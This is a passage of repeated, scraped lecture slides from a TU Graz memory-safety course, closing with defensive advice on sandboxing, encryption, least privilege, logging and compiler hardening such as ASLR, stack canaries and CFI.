![Page 430: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/430.jpg)
Expect the worst www.tugraz.at
• Always expect the worst case that could happen!
• In this case: attacker found exploitable bug, circumvented all
countermeasures, got a shell in the sandbox and was able to
read the password file
• Ñ No problem if file is encrypted, and key is derived from PIN
• (Assuming the crypto is good, and you used it correctly)
98 Michael Schwarz — www.iaik.tugraz.at
![Page 431: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/431.jpg)
Why use a Sandbox then? www.tugraz.at
• If we encrypt the data, do we even benefit from a sandbox?
• Attacker cannot read the password file anyway
99 Michael Schwarz — www.iaik.tugraz.at
![Page 432: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/432.jpg)
Why use a Sandbox then? www.tugraz.at
• If we encrypt the data, do we even benefit from a sandbox?
• Attacker cannot read the password file anyway
99 Michael Schwarz — www.iaik.tugraz.at
![Page 433: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/433.jpg)
Why use a Sandbox then? www.tugraz.at
• If we encrypt the data, do we even benefit from a sandbox?
• Attacker cannot read the password file anyway
99 Michael Schwarz — www.iaik.tugraz.at
![Page 434: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/434.jpg)
Always use a Sandbox! www.tugraz.at
• Without sandbox, attacker can create/modify files
• Attacker could install a keylogger or other malicious software
• Or replace the password manager with a manipulated one
leaking the PIN
• Best crypto does not help if system is compromised
100 Michael Schwarz — www.iaik.tugraz.at
![Page 435: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/435.jpg)
Always use a Sandbox! www.tugraz.at
• Without sandbox, attacker can create/modify files
• Attacker could install a keylogger or other malicious software
• Or replace the password manager with a manipulated one
leaking the PIN
• Best crypto does not help if system is compromised
100 Michael Schwarz — www.iaik.tugraz.at
![Page 436: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/436.jpg)
Always use a Sandbox! www.tugraz.at
• Without sandbox, attacker can create/modify files
• Attacker could install a keylogger or other malicious software
• Or replace the password manager with a manipulated one
leaking the PIN
• Best crypto does not help if system is compromised
100 Michael Schwarz — www.iaik.tugraz.at
![Page 437: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/437.jpg)
Always use a Sandbox! www.tugraz.at
• Without sandbox, attacker can create/modify files
• Attacker could install a keylogger or other malicious software
• Or replace the password manager with a manipulated one
leaking the PIN
• Best crypto does not help if system is compromised
100 Michael Schwarz — www.iaik.tugraz.at
![Page 438: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/438.jpg)
Best practice www.tugraz.at
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find
(and sue) the attacker
• Compiler can help to harden your application, e.g., using
compile flags such as -D FORTIFY SOURCE=2
101 Michael Schwarz — www.iaik.tugraz.at
![Page 439: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/439.jpg)
Best practice www.tugraz.at
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find
(and sue) the attacker
• Compiler can help to harden your application, e.g., using
compile flags such as -D FORTIFY SOURCE=2
101 Michael Schwarz — www.iaik.tugraz.at
![Page 440: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/440.jpg)
Best practice www.tugraz.at
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find
(and sue) the attacker
• Compiler can help to harden your application, e.g., using
compile flags such as -D FORTIFY SOURCE=2
101 Michael Schwarz — www.iaik.tugraz.at
![Page 441: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/441.jpg)
Best practice www.tugraz.at
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find
(and sue) the attacker
• Compiler can help to harden your application, e.g., using
compile flags such as -D FORTIFY SOURCE=2
101 Michael Schwarz — www.iaik.tugraz.at
![Page 442: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/442.jpg)
Best practice www.tugraz.at
• Never assume perfect countermeasures or bug-free code
• Encrypt your data in case it leaks (it will at some point)
• Minimize privileges (e.g., a server should not run as root)
• Log everything – in case of an attack, you have a chance to find
(and sue) the attacker
• Compiler can help to harden your application, e.g., using
compile flags such as -D FORTIFY SOURCE=2
101 Michael Schwarz — www.iaik.tugraz.at
![Page 443: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/443.jpg)
Take Aways www.tugraz.at
• Never ignore compiler warnings
• Don’t disable default counteremeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
![Page 444: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/444.jpg)
Take Aways www.tugraz.at
• Never ignore compiler warnings
• Don’t disable default counteremeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
![Page 445: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/445.jpg)
Take Aways www.tugraz.at
• Never ignore compiler warnings
• Don’t disable default counteremeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
![Page 446: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/446.jpg)
Take Aways www.tugraz.at
• Never ignore compiler warnings
• Don’t disable default counteremeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
![Page 447: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/447.jpg)
Take Aways www.tugraz.at
• Never ignore compiler warnings
• Don’t disable default counteremeasures (e.g., stack canaries)
• Enable countermeasures that are cheap, e.g., ASLR
• Consider stronger countermeasures, such as CFI
• Always consider sandboxing your application
102 Michael Schwarz — www.iaik.tugraz.at
![Page 448: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/448.jpg)
Summary www.tugraz.at
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: impossible to have bug free code, but try to
reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
![Page 449: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/449.jpg)
Summary www.tugraz.at
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: impossible to have bug free code, but try to
reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
![Page 450: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/450.jpg)
Summary www.tugraz.at
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: impossible to have bug free code, but try to
reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
![Page 451: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/451.jpg)
Summary www.tugraz.at
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: impossible to have bug free code, but try to
reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
![Page 452: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/452.jpg)
Summary www.tugraz.at
• Defending software is hard, but not impossible
• Defenses are important to raise the cost for an attacker
• Security is a cat-and-mouse game full of repetitions
• The best countermeasure: don’t have bugs in your code
• Realistic view: impossible to have bug free code, but try to
reduce the number of bugs
103 Michael Schwarz — www.iaik.tugraz.at
![Page 453: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/453.jpg)
Any Questions?